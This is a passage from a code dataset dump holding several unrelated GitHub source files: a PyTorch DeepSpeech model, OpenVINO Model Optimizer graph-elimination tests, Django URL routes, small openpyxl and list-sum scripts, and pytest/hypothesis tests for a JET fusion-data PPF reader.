def __init__(self, config):\n super(DeepSpeech, self).__init__()\n batch_size = config[\"batch_size\"]\n input_size = config[\"input_size\"]\n n_context = config[\"n_context\"]\n linear_size = config[\"linear_size\"]\n self.rnn_hidden_size = config[\"rnn_hidden_size\"]\n vocab_size = config[\"vocab_size\"]\n\n hidden_1 = linear_size \n hidden_2 = linear_size\n hidden_5 = linear_size\n self.hidden_3 = self.rnn_hidden_size\n self.output_size = vocab_size + 1\n\n self.mlp123 = nn.Sequential(\n nn.Linear(input_size+2*input_size*n_context, hidden_1),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_1, hidden_2),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_2, self.hidden_3),\n nn.ReLU(inplace=True),\n )\n self.rnn = nn.RNN(self.hidden_3, self.rnn_hidden_size, num_layers=1, bidirectional=False) # bidir true\n self.mlp56 = nn.Sequential(\n nn.Linear(self.rnn_hidden_size, hidden_5),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_5, self.output_size),\n )\n \n def forward(self, x):\n # x: [b, seq_len, n_input + 2*input_size*n_context]\n batch_size = x.size(0)\n seq_len = x.size(1)\n x = x.permute(1, 0, 2)\n x = x.reshape(seq_len*batch_size, -1)\n x = self.mlp123(x)\n x = x.reshape(seq_len, batch_size, self.hidden_3)\n x, _ = self.rnn(x)\n x = x.reshape(seq_len*batch_size, self.rnn_hidden_size)\n x = self.mlp56(x)\n x = x.reshape(seq_len, batch_size, self.output_size)\n return x.log_softmax(2)","repo_name":"sherryzyy/GPU-Accelerated-Speech-Recognition","sub_path":"baseline/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23525231578","text":"import unittest\n\nimport numpy as np\n\nfrom mo.graph.graph import Node, erase_node\nfrom mo.middle.passes.eliminate import mark_output_reachable_nodes, graph_clean_up, \\\n get_nodes_with_attributes, mark_const_producer_nodes\nfrom mo.utils.unittest.graph import build_graph\n\nnodes_attributes = {'placeholder_1': {'type': 'Placeholder', 'kind': 'op'},\n 'placeholder_2': {'type': 'Placeholder', 'kind': 'op'},\n 'node_1': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'node_2': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'node_3': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'node_4': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'node_5': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'node_6': {'type': 'Identity', 'value': None, 'kind': 'op'},\n 'placeholder_1_data_node': {'value': None, 'kind': 'data'},\n 'placeholder_2_data_node': {'value': None, 'kind': 'data'},\n 'data_node_1': {'value': None, 'kind': 'data'},\n 'data_node_2': {'value': None, 'kind': 'data'},\n 'data_node_3': {'value': None, 'kind': 'data'},\n 'data_node_3_2': {'value': None, 'kind': 'data'},\n 'data_node_4': {'value': None, 'kind': 'data'},\n 'data_node_5': {'value': None, 'kind': 'data'},\n 'data_node_6': {'value': None, 'kind': 'data'},\n 'tf_call_1': {'type': 'TFCustomSubgraphCall', 'kind': 'op'},\n 'tf_call_2': {'type': 'TFCustomSubgraphCall', 'kind': 'op'},\n 'tf_call_3': {'type': 'TFCustomSubgraphCall', 'kind': 'op'},\n }\n\n\nclass TestEliminatePass(unittest.TestCase):\n def test_mark_output_unreachable_nodes(self):\n \"\"\"\n Checks that all nodes that are unreachable from output nodes are marked correspondingly.\n The graph doesn't contain data nodes yet.\n \"node_4\" is output.\n\n placeholder_1->node_1->node_2\n \\\n -> node_3->node_4\n\n :return: None\n \"\"\"\n graph = build_graph(nodes_attributes,\n 
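The DeepSpeech module above reshapes between batch-major input and time-major CTC logits. A shape smoke test, assuming the class definition above is in scope and using a hypothetical tiny config (the key names match those read in __init__):

```python
import torch

cfg = {"batch_size": 2, "input_size": 26, "n_context": 9,
       "linear_size": 64, "rnn_hidden_size": 64, "vocab_size": 28}

model = DeepSpeech(cfg)
feat_dim = cfg["input_size"] * (1 + 2 * cfg["n_context"])  # 494 here
x = torch.rand(2, 50, feat_dim)                 # [batch, seq_len, features]
out = model(x)
assert out.shape == (50, 2, cfg["vocab_size"] + 1)  # time-major CTC logits
```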
[('placeholder_1', 'node_1'),\n ('node_1', 'node_2'),\n ('placeholder_1', 'node_3'),\n ('node_3', 'node_4')],\n {'node_4': {'is_output': True}},\n nodes_with_edges_only=True)\n mark_output_reachable_nodes(graph)\n\n self.assertListEqual(sorted(['placeholder_1', 'node_3', 'node_4']),\n sorted(get_nodes_with_attributes(graph, is_output_reachable=True)))\n self.assertListEqual(sorted(['node_1', 'node_2']),\n sorted(get_nodes_with_attributes(graph, is_output_reachable=False)))\n\n def test_mark_output_unreachable_nodes_behind_output(self):\n \"\"\"\n Checks case when unreachable node is 'behind' (i.e. is the child) of the output node.\n The graph doesn't contain data nodes yet.\n \"node_2\" is output.\n\n placeholder_1->node_1->node_2->node_3\n\n :return: None\n \"\"\"\n graph = build_graph(nodes_attributes,\n [('placeholder_1', 'node_1'),\n ('node_1', 'node_2'),\n ('node_2', 'node_3')],\n {'node_2': {'is_output': True}},\n nodes_with_edges_only=True)\n mark_output_reachable_nodes(graph)\n\n self.assertListEqual(sorted(['placeholder_1', 'node_1', 'node_2']),\n sorted(get_nodes_with_attributes(graph, is_output_reachable=True)))\n self.assertFalse(graph.node['node_3']['is_output_reachable'])\n\n def test_mark_ops_producing_constant_values(self):\n \"\"\"\n Checks case when operation produces only constant tensors so it could be removed. If the node produces several\n tensors and at least one of them is not constant then we should not mark this node.\n The graph contains data nodes.\n \"data_node_2\" and \"data_node_5\" are output.\n \"node_3\" produces constant tensor \"data_node_3\" and non-constant tensor \"data_node_3_2\".\n \"node_6\" produces constant tensor \"data_node_6\".\n \"node_4\" could be eliminated since it gets constant input.\n\n node_6->data_node_6->\n \\\n placeholder_1->placeholder_1_data_node->node_1->data_node_1->node_2->data_node_2\n /\n node_3->data_node_3->node_4->data_node_4->\n \\\n ->data_node_3_2->node_5->data_node_5\n\n :return: None\n \"\"\"\n graph = build_graph(nodes_attributes,\n [('placeholder_1', 'placeholder_1_data_node'),\n ('placeholder_1_data_node', 'node_1'),\n ('node_1', 'data_node_1'),\n ('data_node_1', 'node_2'),\n ('node_2', 'data_node_2'),\n ('node_3', 'data_node_3'),\n ('node_3', 'data_node_3_2'),\n ('node_6', 'data_node_6'),\n ('data_node_6', 'node_1'),\n ('data_node_3_2', 'node_5'),\n ('node_5', 'data_node_5'),\n ('data_node_3', 'node_4'),\n ('data_node_4', 'node_1')],\n {'data_node_2': {'is_output': True},\n 'data_node_5': {'is_output': True},\n 'data_node_3': {'value': np.array(1)},\n 'data_node_6': {'value': np.array(1)}},\n nodes_with_edges_only=True)\n mark_const_producer_nodes(graph)\n self.assertTrue((graph.node['node_6']['is_const_producer']))\n self.assertListEqual(sorted(['node_1', 'node_2', 'node_3', 'node_5', 'placeholder_1']),\n sorted(get_nodes_with_attributes(graph, is_const_producer=False, kind='op')))\n\n graph_clean_up(graph)\n self.assertTrue('node_3' in graph.nodes())\n self.assertTrue('node_4' not in graph.nodes())\n self.assertTrue('node_6' not in graph.nodes())\n\n def test_undead_nodes_with_constant_inputs(self):\n \"\"\"\n Checks that if node of 'undead' type has constant inputs it is not removed from the graph.\n :return: None\n \"\"\"\n pass\n\n def test_remove_node_from_graph(self):\n \"\"\"\n Checks case when remove node from graph.\n The graph doesn't contain removed node yet.\n \"node_2\" should be removed.\n\n placeholder_1->node_1->node_2->node_3\n\n :return: None\n \"\"\"\n graph = build_graph(nodes_attributes,\n 
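mark_output_reachable_nodes is exercised above but defined elsewhere in the Model Optimizer; its notion of reachability (a node is kept iff some output node can be reached from it) can be reproduced with networkx ancestors. A sketch of the concept, not the MO implementation:

```python
import networkx as nx

def output_reachable(graph: nx.DiGraph, outputs) -> set:
    """Nodes from which at least one output is reachable, plus the
    outputs themselves; the same partition the test above checks."""
    keep = set(outputs)
    for out in outputs:
        keep |= nx.ancestors(graph, out)
    return keep

g = nx.DiGraph([("in", "a"), ("a", "b"), ("in", "c"), ("c", "out")])
assert output_reachable(g, ["out"]) == {"in", "c", "out"}  # a, b dropped
```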
[('placeholder_1', 'node_1'),\n ('node_1', 'node_2'),\n ('node_2', 'node_3')],\n nodes_with_edges_only=True)\n erase_node(Node(graph, 'node_2'))\n\n self.assertListEqual(sorted(['placeholder_1', 'node_1', 'node_3']), sorted(graph.nodes()))\n","repo_name":"pc2/CustoNN2","sub_path":"dldt/model-optimizer/mo/middle/passes/eliminate_test.py","file_name":"eliminate_test.py","file_ext":"py","file_size_in_byte":7433,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"48149214514","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('post/', post, name='post'),\n path('post_write/', post_write, name='post_write'),\n path('post_detail//', post_detail, name='post_detail'),\n path('post_delete//', post_delete, name='post_delete'),\n path('post_modify//', post_modify, name='post_modify'),\n path('comment_create/', comment_create, name='comment_create'),\n path('comment_delete/', comment_delete, name='comment_delete'),\n path('search/', search, name='search'),\n]","repo_name":"znzmektm425/zeronine-parkjisu","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27740418457","text":"import os\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\n\npath = os.path.dirname(os.path.abspath(__file__))\n\n# wb = Workbook()\n# sheet = wb.active\n# sheet['A1'] = 'hello'\n# wb.save('%s/test.xlsx' % path)\n\nwb = load_workbook('test.xlsx')\nsheet = wb['Sheet']\nn = sheet['A1'].value\nprint(n)\nsheet['A1'] = 'world'\nwb.save('%s/test.xlsx' % path)","repo_name":"tahitian/python_script","sub_path":"openpyxl_demo.py","file_name":"openpyxl_demo.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43261519396","text":"list_a = [1, 2, 3, 4, 5]\n\ndef list_sum(lst):\n sum = 0\n for i in lst:\n sum = sum + i\n return sum\n\nprint(list_sum(list_a)) \n\n\n#print(sum(list_a))\n# numbers=[1,2,3,4]\n# result=0\n# for i in numbers:\n# result=result+i\n# print(result) \n","repo_name":"hyunin3/practice","sub_path":"List의 합 구하기.py","file_name":"List의 합 구하기.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3095434871","text":"\"\"\"Test reading from SAL database.\"\"\"\n\nfrom contextlib import contextmanager\nfrom contextlib import nullcontext\nimport os\nimport pathlib\nimport re\nimport tempfile\nfrom typing import Callable\nfrom typing import cast\nfrom typing import List\nfrom typing import Union\nfrom unittest.mock import DEFAULT\nfrom unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nfrom hypothesis import given\nfrom hypothesis import settings\nfrom hypothesis.extra.numpy import arrays\nfrom hypothesis.strategies import floats\nfrom hypothesis.strategies import integers\nfrom hypothesis.strategies import just\nfrom hypothesis.strategies import lists\nfrom hypothesis.strategies import sampled_from\nfrom hypothesis.strategies import text\nfrom hypothesis.strategies import tuples\nimport numpy as np\nimport pytest\nimport sal.client\nimport sal.core.exception\nimport scipy.constants as sc\n\nfrom indica.readers import PPFReader\nfrom indica.readers.ppfreader import PPFWarning\nfrom indica.readers.selectors import choose_on_plot\nfrom indica.readers.selectors 
import DataSelector\nfrom indica.session import global_session\nfrom indica.session import Session\nfrom .fake_salclient import BaseFakeSALClient\nfrom ..strategies import sane_floats\n\n\nFAKE_DATA_PATH = pathlib.Path(__file__).parent.absolute() / \"ppf_samples.json\" # .pkl\"\n\n\nclass JETFakeSALClient(BaseFakeSALClient):\n @property\n def data_file(self) -> Union[str, pathlib.Path]:\n return FAKE_DATA_PATH\n\n\npulses = integers(1, 99999)\ntimes = lists(floats(30.0, 80.0), min_size=2, max_size=2).map(\n cast(Callable[[List[float]], List], sorted)\n)\nerrors = floats(0.0001, 0.2)\nmax_freqs = floats(2.0, 1000.0)\nrevisions = integers(0)\nactual_revisions = integers(1)\nedited_revisions = lists(actual_revisions, min_size=1, unique=True).map(\n cast(Callable[[List[int]], List], sorted)\n)\nlines_of_sight = tuples(\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n arrays(float, 35, elements=floats(allow_infinity=False, allow_nan=False)),\n)\n\n\ndef patched_ppf_reader(\n pulse: int,\n tstart: float,\n tend: float,\n server: str = \"FakeSAL\",\n default_error: float = 0.05,\n max_freq: float = 1e6,\n selector: DataSelector = choose_on_plot,\n session: Session = global_session,\n):\n with patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n reader = PPFReader(\n pulse, tstart, tend, server, default_error, max_freq, selector, session\n )\n reader._read_cached_ppf = MagicMock(return_value=None) # type: ignore\n reader._write_cached_ppf = MagicMock() # type: ignore\n return reader\n\n\ndef trim_lines_of_sight(los, n):\n \"\"\"Return a new tuple with the LOS arrays trimmed to length n.\"\"\"\n return tuple(d[:n] for d in los)\n\n\ndef get_record(reader, pulse, uid, instrument, dtype, revision):\n \"\"\"Gets the path for the requested record, with the correct revision for\n the data actually heald in the database.\"\"\"\n path = f\"/pulse/{pulse:d}/ppf/signal/{uid}/{instrument}/{dtype}\"\n rev = reader._client.list(path + f\":{revision}\").revision_current\n return path + f\":{rev}\"\n\n\n@given(pulses, times, errors, max_freqs, text(), text())\ndef test_authentication(pulse, time_range, error, freq, user, password):\n \"\"\"Test authentication method on client get called.\"\"\"\n with patch(\"indica.readers.ppfreader.SALClient\", JETFakeSALClient):\n reader = PPFReader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n assert reader.authenticate(user, password)\n reader._client.authenticate.assert_called_once_with(user, password)\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n sampled_from([\"hrts\", \"lidr\"]),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"hrts\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n)\ndef test_get_thomson_scattering(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n):\n \"\"\"Test quantities returned by _get_thomson_scattering are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n 
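The `times` strategy above draws two floats and maps sorted() over the list so every generated example satisfies tstart <= tend. The same trick stands alone as a small property test:

```python
from hypothesis import given, strategies as st

# Draw two floats, then sort, so the pair is always ordered.
ordered_pair = st.lists(st.floats(30.0, 80.0), min_size=2, max_size=2).map(sorted)

@given(ordered_pair)
def test_pair_is_ordered(pair):
    tstart, tend = pair
    assert tstart <= tend

test_pair_is_ordered()  # calling the wrapper runs the hypothesis loop
```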
reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n with pytest.raises(sal.core.exception.NodeNotFound) if bad_rev else nullcontext():\n results = reader._get_thomson_scattering(uid, instrument, revision, quantities)\n if bad_rev:\n return\n z_signal = reader._client.construct_signal(f\"{instrument}/z\")\n assert np.all(z_signal.data == results[\"z\"])\n assert len(z_signal.data) == results[\"length\"]\n assert np.all(z_signal.dimensions[0].data == results[\"R\"])\n records = [get_record(reader, pulse, uid, instrument, \"z\", revision)]\n for q in quantities:\n signal = reader._client.construct_signal(f\"{instrument}/{q}\")\n assert np.all(results[q] == signal.data)\n assert np.all(results[\"times\"] == signal.dimensions[0].data)\n if instrument == \"lidr\":\n error_signal = reader._client.construct_signal(f\"{instrument}/{q}u\")\n np.testing.assert_allclose(\n results[q] + results[q + \"_error\"], error_signal.data\n )\n else:\n error_signal = reader._client.construct_signal(f\"{instrument}/d{q}\")\n np.testing.assert_allclose(results[q + \"_error\"], error_signal.data)\n assert np.all(results[\"times\"] == error_signal.dimensions[0].data)\n expected = sorted(\n records\n + list(\n map(\n lambda x: get_record(reader, pulse, uid, instrument, x, revision),\n [q, q + \"u\" if instrument == \"lidr\" else \"d\" + q],\n )\n )\n )\n assert sorted(results[q + \"_records\"]) == expected\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"cgiroud\"),\n sampled_from(\n [key for key in PPFReader.INSTRUMENT_METHODS.keys() if \"cx\" in key.lower()[:2]]\n ),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"cxg6\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n)\ndef test_get_charge_exchange(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n):\n \"\"\"Test quantities returned by _get_charge_exchange are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n with pytest.raises(sal.core.exception.NodeNotFound) if bad_rev else nullcontext():\n results = reader._get_charge_exchange(uid, instrument, revision, quantities)\n if bad_rev:\n return\n z_signal = reader._client.construct_signal(f\"{instrument}/pos\")\n assert np.all(z_signal.data[0, :] == results[\"z\"])\n assert len(z_signal.data[0, :]) == results[\"length\"]\n assert np.all(\n reader._client.construct_signal(f\"{instrument}/rpos\").data[0, :] == results[\"R\"]\n )\n assert np.all(\n reader._client.construct_signal(f\"{instrument}/texp\").data == results[\"texp\"]\n )\n assert isinstance(results[\"element\"], str)\n records = [\n get_record(reader, pulse, uid, instrument, q, revision)\n for q in [\"pos\", \"rpos\", \"texp\", \"mass\"]\n ]\n uncertainties = {\"angf\": \"afhi\", \"conc\": \"cohi\", \"ti\": \"tihi\"}\n for q in quantities:\n signal = reader._client.construct_signal(f\"{instrument}/{q}\")\n assert np.all(results[q] == signal.data)\n assert np.all(results[\"times\"] == signal.dimensions[0].data)\n error_signal = reader._client.construct_signal(\n f\"{instrument}/{uncertainties[q]}\"\n )\n np.testing.assert_allclose(\n results[q + \"_error\"] + results[q], error_signal.data\n )\n assert np.all(results[\"times\"] == 
error_signal.dimensions[0].data)\n assert sorted(results[q + \"_records\"]) == sorted(\n records\n + [\n get_record(reader, pulse, uid, instrument, x, revision)\n for x in [q, uncertainties[q]]\n ]\n )\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n sampled_from([\"efit\", \"eftp\"]),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"efit\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n)\ndef test_get_equilibrium(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n):\n \"\"\"Test quantities returned by _get_equilibrium are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n with pytest.raises(sal.core.exception.NodeNotFound) if bad_rev else nullcontext():\n results = reader._get_equilibrium(uid, instrument, revision, quantities)\n if bad_rev:\n return\n signal = reader._client.construct_signal(f\"{instrument}/f\")\n if len({\"f\", \"ftor\", \"vjac\", \"rmji\", \"rmjo\"} & quantities) > 0:\n assert np.all(signal.dimensions[1].data == results[\"psin\"])\n for q in quantities:\n signal = reader._client.construct_signal(f\"{instrument}/{q}\")\n assert np.all(results[q].flatten() == signal.data.flatten())\n assert np.all(results[\"times\"] == signal.dimensions[0].data)\n if q == \"psi\":\n assert sorted(results[q + \"_records\"]) == sorted(\n map(\n lambda x: get_record(reader, pulse, uid, instrument, x, revision),\n [\"psi\", \"psir\", \"psiz\"],\n )\n )\n else:\n assert results[q + \"_records\"] == [\n get_record(reader, pulse, uid, instrument, q, revision)\n ]\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n just(\"kk3\"),\n just({\"te\"}),\n revisions,\n edited_revisions,\n sane_floats(),\n)\n@settings(deadline=2000)\ndef test_get_cyclotron_emissions(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n quantities,\n revision,\n available_revisions,\n z,\n):\n \"\"\"Test quantities returned by _get_cyclotrons_emissions are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n mock_surf = MagicMock(\n return_value=(\n np.array([0]),\n np.array([0]),\n np.array([z]),\n np.array([z]),\n np.array([0]),\n np.array([0]),\n )\n )\n with patch(\"indica.readers.surf_los.read_surf_los\", mock_surf), pytest.raises(\n sal.core.exception.NodeNotFound\n ) if bad_rev else nullcontext():\n results = reader._get_cyclotron_emissions(uid, instrument, revision, quantities)\n if bad_rev:\n return\n assert results[\"z\"] == z\n # TODO: determine how best to describe the SURF data for PROV\n records = [\n \"surf_los.dat\",\n get_record(reader, pulse, uid, instrument, \"gen\", revision),\n ]\n assert results[\"machine_dims\"] == ((1.83, 3.9), (-1.75, 2.0))\n gen = reader._client.construct_signal(f\"{instrument}/gen\")\n for q in quantities:\n vals = results[q]\n channel_names = [\n f\"{q}{chan + 1:02d}\" for chan, v in enumerate(gen.data[0, :]) if v > 0.0\n ]\n channel_indices = [int(c[-2:]) - 1 for c in channel_names]\n for i, name in enumerate(channel_names):\n assert np.all(\n vals[:, i]\n == 
reader._client.construct_signal(f\"{instrument}/{name}\").data\n )\n assert results[\"Btot\"] * sc.e * gen.data[11, channel_indices] / (\n 2 * np.pi * sc.m_e\n ) == pytest.approx(gen.data[15, channel_indices] * 1e9)\n assert np.all(results[q + \"_error\"] == pytest.approx(error * vals))\n bad_channels = np.argwhere(np.isin(results[\"Btot\"], results[\"bad_channels\"]))\n assert np.all(gen.data[18, bad_channels] == 0)\n assert np.all(gen.data[19, bad_channels] == 0)\n assert np.all(np.delete(gen.data[18, :], bad_channels) != 0)\n assert np.all(np.delete(gen.data[19, :], bad_channels) != 0)\n assert sorted(results[q + \"_records\"]) == sorted(\n records\n + [\n get_record(reader, pulse, uid, instrument, x, revision)\n for x in channel_names\n ]\n )\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n just(\"sxr\"),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"sxr\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n lines_of_sight,\n)\ndef test_get_sxr(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n los,\n):\n \"\"\"Test SXR quantities returned by _get_radiation are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n LOS_LENS = {\"sxr/h\": 17, \"sxr/t\": 35, \"sxr/v\": 35}\n mock_surf = MagicMock(\n side_effect=lambda f, p, inst: trim_lines_of_sight(los, LOS_LENS[inst])\n )\n with patch(\"indica.readers.surf_los.read_surf_los\", mock_surf), pytest.raises(\n sal.core.exception.NodeNotFound\n ) if bad_rev else nullcontext():\n results = reader._get_radiation(uid, instrument, revision, quantities)\n\n if bad_rev:\n return\n\n assert results[\"machine_dims\"] == ((1.83, 3.9), (-1.75, 2.0))\n # TODO: determine how best to describe the SURF data for PROV\n records = [\"surf_los.dat\"]\n for q in quantities:\n radiation = results[q]\n assert results[\"length\"][q] == radiation.shape[1]\n channel_names = [\n key.split(\"/\")[-1]\n for key in reader._client.data_specs\n if re.search(rf\"{q}\\d\\d$\", key, re.I)\n ]\n channel_indices = [int(c[-2:]) - 1 for c in channel_names]\n for i, name in enumerate(channel_names):\n signal = reader._client.construct_signal(f\"{instrument}/{name}\")\n assert np.all(radiation[:, i] == signal.data)\n assert np.all(results[q + \"_times\"] == signal.dimensions[0].data)\n assert np.all(results[q + \"_xstart\"] == los[0][channel_indices])\n assert np.all(results[q + \"_xstop\"] == los[1][channel_indices])\n assert np.all(results[q + \"_zstart\"] == los[2][channel_indices])\n assert np.all(results[q + \"_zstop\"] == los[3][channel_indices])\n assert np.all(results[q + \"_error\"] == pytest.approx(error * radiation))\n assert sorted(results[q + \"_records\"]) == sorted(\n records\n + list(\n map(\n lambda x: get_record(reader, pulse, uid, instrument, x, revision),\n channel_names,\n )\n )\n )\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n just(\"bolo\"),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"bolo\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n lines_of_sight,\n)\ndef test_get_radiation(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n los,\n):\n 
\"\"\"Test bolometric quantities returned by _get_radiation are correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n LOS_LENS = {\"bolo/kb5v\": 32, \"bolo/kb5h\": 24}\n mock_surf = MagicMock(\n side_effect=lambda f, p, inst: trim_lines_of_sight(los, LOS_LENS[inst])\n )\n with patch(\"indica.readers.surf_los.read_surf_los\", mock_surf), pytest.raises(\n sal.core.exception.NodeNotFound\n ) if bad_rev else nullcontext():\n results = reader._get_radiation(uid, instrument, revision, quantities)\n if bad_rev:\n return\n # TODO: determine how best to describe the SURF data for PROV\n records = [\"surf_los.dat\"]\n for q in quantities:\n radiation = results[q]\n length = results[\"length\"][q]\n assert length == radiation.shape[1]\n signal = reader._client.construct_signal(f\"{instrument}/{q}\")\n assert np.all(radiation == signal.data)\n assert np.all(results[q + \"_times\"] == signal.dimensions[0].data)\n assert np.all(results[q + \"_xstart\"] == los[0][:length])\n assert np.all(results[q + \"_xstop\"] == los[1][:length])\n assert np.all(results[q + \"_zstart\"] == los[2][:length])\n assert np.all(results[q + \"_zstop\"] == los[3][:length])\n assert np.all(results[q + \"_error\"] == pytest.approx(error * radiation))\n assert sorted(results[q + \"_records\"]) == sorted(\n records + [get_record(reader, pulse, uid, instrument, q, revision)]\n )\n\n\n@given(\n pulses,\n times,\n errors,\n max_freqs,\n just(\"jetppf\"),\n just(\"ks3\"),\n revisions,\n edited_revisions,\n lists(\n sampled_from(list(PPFReader.available_quantities(\"ks3\").keys())),\n min_size=1,\n unique=True,\n ).map(set),\n)\ndef test_get_bremsstrahlung_spectroscopy(\n pulse,\n time_range,\n error,\n freq,\n uid,\n instrument,\n revision,\n available_revisions,\n quantities,\n):\n \"\"\"Test data returned by _get_bremsstrahlung_spectroscopy is correct.\"\"\"\n reader = patched_ppf_reader(\n pulse,\n *time_range,\n default_error=error,\n max_freq=freq,\n selector=MagicMock(),\n session=MagicMock(),\n )\n reader._client._revisions = available_revisions\n bad_rev = revision != 0 and revision < available_revisions[0]\n with pytest.raises(sal.core.exception.NodeNotFound) if bad_rev else nullcontext():\n results = reader._get_bremsstrahlung_spectroscopy(\n uid, instrument, revision, quantities\n )\n if bad_rev:\n return\n assert results[\"machine_dims\"] == ((1.83, 3.9), (-1.75, 2.0))\n for q in quantities:\n signal = reader._client.construct_signal(f\"{instrument}/{q}\")\n assert np.all(results[q] == signal.data)\n assert np.all(results[\"times\"] == signal.dimensions[0].data)\n # error_signal = reader._client.construct_signal(\n # f\"{instrument}/{q[0]}{q[-1]}hi\"\n # )\n # TODO: Figure out what the correct error is supposed to be\n assert np.all(results[q + \"_error\"] == 0.0)\n # assert np.all(results[\"times\"] == error_signal.dimensions[0].data)\n los = reader._client.construct_signal(f\"edg7/los{q[-1]}\")\n assert results[q + \"_xstart\"].shape == (1,)\n assert results[q + \"_xstop\"].shape == (1,)\n assert results[q + \"_zstart\"].shape == (1,)\n assert results[q + \"_zstop\"].shape == (1,)\n assert results[\"length\"][q] == 1\n assert np.all(results[q + \"_xstart\"] == los.data[1] / 1000)\n assert np.all(results[q + \"_xstop\"] == los.data[4] / 1000)\n assert np.all(results[q + \"_zstart\"] == los.data[2] / 
